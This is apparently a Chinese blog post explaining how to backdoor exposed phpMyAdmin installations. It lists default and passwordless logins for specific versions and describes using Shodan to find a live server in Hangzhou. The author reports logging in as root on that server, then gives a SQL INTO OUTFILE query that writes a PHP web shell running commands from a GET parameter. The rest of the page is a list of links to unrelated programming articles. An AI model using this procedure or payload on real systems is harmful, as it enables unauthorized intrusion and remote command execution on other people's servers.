phpMyAdmin通过密码漏洞留后门文件


Posted in PHP onNovember 20, 2018
  • 默认 phpMyAdmin:用户名 root 密码 root 或空登陆。
  • 版本 2.11.3~2.11.4:用户名 'localhost'@'@" 登陆,无需密码。
  • 版本 2.11.9.2:用户名 root 登陆,无需密码。

经测试,第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。

下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。

祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

phpMyAdmin

phpMyAdmin通过密码漏洞留后门文件

先看看有没有不需要密码登陆的,逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的(浙江省·杭州市)。

phpMyAdmin通过密码漏洞留后门文件

地址已手动打码。

http://121.***.*.219:80/

phpMyAdmin通过密码漏洞留后门文件

登陆成功(root 权限)。

phpMyAdmin通过密码漏洞留后门文件

接下来你可以写一个 outfile 到对方主机的网络目录下。俗称 “留后门”。

SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后门文件的绝对路径"

点击运行,不出意外便在对方主机留下了一个名为 runme.php 的后门文件。

总结

以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对三水点靠木的支持。如果你想了解更多相关内容请查看下面相关链接

PHP 相关文章推荐
php学习之 数组声明
Jun 09 PHP
使用php发送有附件的电子邮件-(PHPMailer使用的实例分析)
Apr 26 PHP
关于php程序报date()警告的处理(date_default_timezone_set)
Oct 22 PHP
ThinkPHP3.1查询语言详解
Jun 19 PHP
php操作XML、读取数据和写入数据的实现代码
Aug 15 PHP
Apache启动报错No space left on device: AH00023该怎么解决
Oct 16 PHP
PHP实现适用于自定义的验证码类
Jun 15 PHP
PHP读MYSQL中文乱码的快速解决方法
Oct 01 PHP
Yii CDBCriteria常用方法实例小结
Jan 19 PHP
php安装扩展mysqli的实现步骤及报错解决办法
Sep 23 PHP
PHP迭代器和生成器用法实例分析
Sep 28 PHP
PHP pthreads v3在centos7平台下的安装与配置操作方法
Feb 21 PHP
ThinkPHP5 的简单搭建和使用详解
Nov 15 #PHP
关于php unset对json_encode的影响详解
Nov 14 #PHP
PHP集成环境XAMPP的安装与配置
Nov 13 #PHP
python进程与线程小结实例分析
Nov 11 #PHP
PHP 获取客户端 IP 地址的方法实例代码
Nov 11 #PHP
如何优雅的使用 laravel 的 validator验证方法
Nov 11 #PHP
php使用curl模拟浏览器表单上传文件或者图片的方法
Nov 10 #PHP
You might like
七款最流行的PHP本地服务器分享
2013/02/19 PHP
php表单提交与$_POST实例分析
2015/01/26 PHP
如何在HTML 中嵌入 PHP 代码
2015/05/13 PHP
PHP实现文件上传和多文件上传
2015/12/24 PHP
验证token、回复图文\文本、推送消息的实用微信类php代码
2016/06/28 PHP
php加速缓存器opcache,apc,xcache,eAccelerator原理与配置方法实例分析
2020/03/02 PHP
Json字符串转换为JS对象的高效方法实例
2013/05/01 Javascript
jQuery实现输入框下拉列表树插件特效代码分享
2015/08/27 Javascript
jQuery模仿京东/天猫商品左侧分类导航菜单效果
2016/06/29 Javascript
简单实现js间歇或无缝滚动效果
2016/06/29 Javascript
Bootstrap CSS组件之分页(pagination)和翻页(pager)
2016/12/17 Javascript
JS动态生成年份和月份实例代码
2017/02/04 Javascript
扫微信小程序码实现网站登陆实现解析
2019/08/20 Javascript
uploadify插件实现多个图片上传并预览
2019/09/30 Javascript
JavaScript实现更换背景图片
2019/10/18 Javascript
[42:11]TNC vs Pain 2018国际邀请赛小组赛BO2 第二场 8.17
2018/08/20 DOTA
Djang中静态文件配置方法
2015/07/30 Python
Python实现将xml导入至excel
2015/11/20 Python
实例讲解Python编程中@property装饰器的用法
2016/06/20 Python
Python中动态创建类实例的方法
2017/03/24 Python
基于Django的python验证码(实例讲解)
2017/10/23 Python
Python打包方法Pyinstaller的使用
2018/10/09 Python
python如何从文件读取数据及解析
2019/09/19 Python
python字符串判断密码强弱
2020/03/18 Python
python实现音乐播放和下载小程序功能
2020/04/26 Python
HTML5的结构和语义(2):结构
2008/10/17 HTML / CSS
HTML5在手机端实现视频全屏展示方法
2020/11/23 HTML / CSS
Carter’s OshKosh加拿大:购买婴幼儿服装和童装
2018/11/27 全球购物
英语专业毕业生求职简历的自我评价
2013/10/24 职场文书
毕业自荐书
2013/12/09 职场文书
幼儿园小班教学反思
2014/02/02 职场文书
劳模先进事迹材料
2014/12/24 职场文书
十佳少年事迹材料
2014/12/25 职场文书
小学教师师德师风自我评价
2015/03/04 职场文书
销售人员管理制度
2015/08/06 职场文书
2016中学教师读书心得体会
2016/01/13 职场文书